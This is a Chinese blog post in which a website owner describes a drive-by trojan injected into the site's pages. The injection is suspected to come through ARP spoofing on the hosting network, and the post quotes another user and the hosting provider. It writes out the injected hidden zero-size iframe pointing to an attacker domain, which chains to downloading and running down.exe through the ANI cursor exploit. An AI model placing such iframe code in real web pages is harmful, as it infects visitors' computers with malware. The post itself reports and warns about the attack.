5月6日,真该死,咨询网(http://www.nnask.com)遭遇木马!
注意:下边给出的网址不可点击,除非你有自信和病毒抗争
访问网站时,IE会自动在后台打开 http://pp.900666.com/d.htm页面,相继转向http://pp.900666.com/11/1.htm,最后下载http://pp.900666.com/down.exe 运行。同时我的麦咖啡报警,检测到exploit anifile.c 病毒。这个明显是早前提到的ani光标漏洞影响。这个问题可以下载微软ani补丁,不过解决不了我的网站问题。
按理来说网站应该没有那么严重的漏洞吧,把疑点最大的供求发布程序完全删除了,貌似没解决。莫非不是我的网站程序问题?
在网上查阅了很多资料,这个木马是出了名的黑名单。在IE中看源代码能看到一个<iframe src=http://pp.900666.com/d.htm width=0 height=0></iframe> 代码,,,而且。。。
该网马据说是现在最完美的网马,命中率达100%,而且目前来说还没有对此木马很好的处理办法,这里只能提醒网站、博客以及其他网站类管理员和站长注意,特别是自己架设服务器的朋友(尽快把各种补丁打全,一旦中了马上关闭后进行彻底杀毒)。中该木马会使网站处于假死状态,而且具有传播性。
难搞哦。。。。。。
还查到这样的资料
“服务器被ARP欺骗,站点浏览会多处出现的框架网址,应该是我的站点所在服务器的局域网中某台服务器被控制,进行局域网内的ARP欺骗使得站点浏览时自动在页面顶部加入 iframe 代码 网友:布鲁斯狼”
就是说,也很可能是arp欺骗,而根本不是我的网站程序问题,希望是类似网友Yuanb遇到的情况:
--------------------------------------------------------------------------------------------------------------
昨天下午打开网站,发观速度出奇的慢, 打开后,又是一片狼藉,像没人管似的很乱很乱.卡巴还弹出警报! 查了首页的源码, 发现顶部多了这一段: <iframe src=http://pp.900666.com/a.htm width=0 height=0></iframe>
很明显是被人挂了马. 论坛里的朋支都说是空间商出了问题,要换空间服务商了. 昨天晚上弄了好久,到睡前还没弄好.
今早一起来,发现又正常了,首页也没有那该死的代码. 随后,我又改了后台密码,FTp的密码. 数据库的路径...
唉! 希望不会再有下次了.
空间商又发来消息:
" 由于我们托管在电信idc中心机房的服务器所在的网段中有一台其它公司的服务器中了病毒,这台中病毒的电脑以arp欺骗形式欺骗同一网段中所有服务器的正确的网关地址,以至于通过错误网关地址出站的页面都被加入代码(这些代码实际上是不存在于我们服务器上的),现在我们已经解决了这个问题,由此给你带来的影响我们深表歉意,希望能给予我们更多的理解,我们将在今后更扎实的做好服务器安全工作。"
--------------------------------------------------------------------------------------------------------------
若非我的网站问题,那就只有明天再咨询空间商了。还好,音符网一点事儿都没有
